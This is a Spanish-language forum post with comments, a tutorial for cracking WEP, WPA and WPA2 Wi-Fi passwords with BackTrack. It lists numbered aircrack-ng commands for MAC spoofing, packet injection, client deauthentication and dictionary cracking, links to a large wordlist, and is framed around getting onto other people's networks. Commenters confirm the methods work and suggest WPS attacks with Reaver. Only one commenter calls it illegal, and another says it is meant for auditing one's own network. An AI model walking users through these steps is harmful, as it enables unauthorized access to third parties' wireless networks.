Hackear WIFI - Crack Wep/Wpa/Wpa2 con Backtrack

Bueno identianos para que no se compliquen con backtrack pueden hackear wep,wap,wpa2... les dejare los videos y un diccionario por mediafire

Si quieren instalar el backtrack les recomiendo que se pasen por mi post: http://www.identi.li/index.php?topic=70881

Para activar la red en virtualbox solo tienen que hacer como la imagen:

Importante: Por este motivo si lo que queréis es tener una tarjeta wireless en la maquina virtual (probablemente para hacer maldades) tendréis que enchufar una USB, PCMCIA o ExpressCard y asignarla a la maquina virtual

Hackear una red wifi WEP Backtrack

Comandos utilizados:

1-iwconfig

2-airmon-ng stop wlan0

3-macchanger -m 00:11:22:33:44:55 wlan0

4-airmon-ng start wlan0

5-airodump-ng wlan0

6-airodump-ng -w ESSID --bssid BSSID --channel x wlan0

7-aireplay-ng -1 0 -e ESSID -a BSSID -h 00:11:22:33:44:55 wlan0 ----eso para autentificarse

8-aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 wlan0 ------eso para inyectar paquetes

9-aircrack-ng redes-01.cap

Hackear una red wifi WAP/WAP2 Backtrack

Diccionario de 28GB descomprimido 74MB comprimido:
http://www.mediafire.com/?tzjyqzzmzn1

Puedes encontrar mas diccionarios links directos en:
http://www.insidepro.com/dictionaries.php

Comandos utilizados:

1-iwconfig

2-airmon-ng stop wlan0

3-macchanger -m 00:11:22:33:44:55 wlan0

4-airmon-ng start wlan0

5-airodump-ng wlan0

6-airodump-ng -w ESSID --bssid BSSID --channel x wlan0

7-aireplay-ng -0 10 -a BSSID -c (mac cliente) wlan0

8-aircrack-ng -w (ruta del diccionario) (archivo cap)

Fuente: CyberLocos
Hackear WIFI - Crack Wep/Wpa/Wpa2 con Backtrack
52 Puntos Score: 5.2/10
Visitas: 73028 Favoritos: 46
Ver los usuarios que votaron...
40 Comentarios Hackear WIFI - Crack Wep/Wpa/Wpa2 con Backtrack
De Verdad funciona la verdad lo veo algo complicado
Cita xxgvnnxx: Mostrar
estos metodos estan comprobados que funcionan es mas yo ya he hecho el de wep y el de wpa se que funciona tambien pero dependiendo de los diccionarios que utilices eso es muy importante para crackear el cifrado que contiene que es wep, wap o wap2

Cita ppipe2.0: Mostrar
Thanks por los puntos  
bueno la verdad bactrack y los diccionarios para sacar una wpa son un verdadero dolor de cabeza , es mucho mejor un ataque con wps  con Reaver que lo trae encorporado el wifislax 4.0 y eran los cifrados wpa ... en 4 a 5 horas (vale la pena esperar) tienes las pass de una wpa sin diccionarios en todo caso buen post amigo  
Cita HuasoDj: Mostrar
sigo prefieriendo los diccionarios   jeje yo use pocas veces wifislax pero es bastante parecido a las distros de linux como wifiway, backtrack, etc  
ajajaja dato viejo jajaja me da flojera eso.
como cuanto tardara en descomprimir el archivo de 28gb con dos procesadores 2.10 ghz , 3 gb de ram
Cita yrk_8: Mostrar
pues si te da flojera esto nunca llegaras a mas en informatica    
Cita white.01: Mostrar
pff no tarda mucho tarda poco
Cita Scorp: Mostrar
gracias por pasarte
Cita white.01: Mostrar
no tarda mucho, elproblema o tiempo que tarde sera cuando la empieze a buscar, imaginate entre millones de palabras..
oye man , yo tengo un cyber como como a dos cuadras de mi calle,
pero en mi casa no llega esa se?
Cita _EpiikO_: Mostrar
es por eso que deje otro enlace a otros diccionarios que pueden ser menos largos para que no busque entre millones de palabras y dependiendo en cuanto procese la informacion el procesador de tu computadora mas rapido ira sacando la clave es por eso tambien que las claves wpa y wpa2 son mas seguras que las claves wep  

Cita Lios95: Mostrar
yo les recomiendo que no hakeen nada de wifi porque es penalizado con la carcel si te cuelgas al internet wifi de algun vecino o de quien sea... es mejor preguntarle si te deja usarlo un rato...
amigo la verdad yo nececito un prog5rama que sea simple yo e udado wirlax la cersion 3.0 como es la 4 le hgao la pregunta a esa persona la cual usa la cuatro lode bastrak no lo usado pero los de los diccionarios son un cacho no hra un programa que tena lso paquetes incorporado ya que la wep sacrale contrase?
Cita Emis: Mostrar
este tutorial es para auditar con redes propias ya si lo usan para sus cosas es otro pedo xD

Cita esmelida: Mostrar
gracias amigo voy a intentar el crack con wpa y wpa2 usaba backtrack pero despues vi el baini a probar gracias
hey man estos diccionarios tambien me sirven para el beini ?
Cita arthusu: Mostrar
amigo lo que pasa es que beni sirve par wep que es lo mas facil yo ando en busca de in sistema el cual ante se llamaba air crak lo buneo que tenia que era para wep2 y wpa per lo maloq eu durab un mes a ver yo lo que necesito es un programa que sea facil de usar pero que sauqe claves wpa o wep 2 ya que las wep ya esta desaparecinedo osea son muy antiguas lo del diccionario si sirve pero nunac tanto lo ideal seria un program que tenga todo este mensaje es par los dos el que usa bastrak y o beini wirlax por eso es mi pregunta aver si tine algun programa por ai que haga eso sacar claves wpa y wp2 skp que son las mas dificiles si tinen alguno porfavor mandelo por este mismo sistema seria de gran utilidad espero respuesta igual se te agrdece el aporte  
Cita rodriyo: Mostrar
claro que si!

Cita bastet1984: Mostrar
jaja si beini con interfaz grafica y mas facil :p  
man pues el tutorial ahi viene en los videos y usan aircrack claro no es version grafica como la que creo que tu quieres es modo consola aircrack paa lo que sirve es para crackear y el diccionario para crackear wap2 wpa y la wep como solo son digitos la mayoria numeros si es que no la cambiaron por eso es que es mas facil hackear y no necesita diccionarios, asi que si buscas aircrack para windows (http://bit.ly/HZwS5r) y listo  
aparte de bastrak tines un programa que sea mas facil qiue usar osea no tantos parrafo para poner uno que sea pratico y rapido habra alguno en tus datos se te agradeceria el aporte espero tu respuesta
http://lmgtfy.com/?q=aircrack+gui+for+windows
o tambien puedes usar....
beini
wifiway
ya que incluyen version gui y son refaciles  
lo otro amigo intento descomprimir los 25gb de diccionario que subiste pero no se pueden descomprimir con win rara me dice qe tiene una falla al descomprimirlo lo puedes subir nuevamente todos eso diccionarios espero tu respuesta
amigo mira estees el programa que ando buscando lo que si 3este program necesiat un crak o un serial CommView?

amigo lo otro para descomprimir los 25gb con win rar me dice  que tiena una falla par poder desomprimirlo tu tendras un seriaal para el programa que te dije anterior para con forwifi
amigo espero tu respuesta
man porfavor ya no hagas doble post ^^, y usa el buscador!
y como te dije en el post ahi muchos mas diccionarios para hackear una wpa/wpa2 te vuelvo a repetir el enlace: http://www.insidepro.com/dictionaries.php
y te dejo el commviewforwifi que encontre usando el buscador =  http://www.identi.li/index.php?topic=44040  
@esmelida
Se me olvido comentarte aqui esta la lista de driver que acepta commview for wifi
http://www.tamos.com/products/commwifi/adapterlist.php  
oye que compresor usas  ... sorprendente de  28 gb a 74 mb parece imposible como lo hisistes
Cita OBANDO300: Mostrar
yo no lo hice lo agarre en la red se comprimio con winrar man solo hay que darle unas opciones hay muchos videos de youtube de como hacerlo pero no funciona con todos los tipos de archivos ademas necestitas mucho tiempo y un buen procesador  
tengo un procesador core i7 2600  y 8 gb de ram .. pero la verdad he tomado muchos tutoriales de eso y ninguno sirve para nada  :/
Cita OBANDO300: Mostrar
en este caso no importa que procesador tenga ni que ram importa si tienes wifi que adaptador wifi (si soporta el driver en linux) tienes y si es posible que se ponga en modo monitor!
saludos, si quieres me puedes mandar un pantallazo del everest y te digo que pex  
el proceso de crackeo para las WPA2 es igual en backtrack 5??? espero tu respuesta por favor
hola que tal gran aporte super completo, mira descargue el diccionario de 28gb y no me deja descomprimirlo me saca error por el 52% podrias ayudarme. gracias
HOLA TENGO ALGUNAS DUDAS YO TENGO EL BACKTRACK 5 ES IGUAL Y YO LO INICO EN UN CD  YA VENDRAN LOS DICCIONARIOS O COMO ES ESTO ME AYUDAS POR FISSSS
Cita SHECY: Mostrar
en backtrack creo que hay una ruta asi: /pentest/passwords/wordlists/darkc0de.lst para llegar a un diccionario  
Cita jotha500: Mostrar
Si  
link no funciona  
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!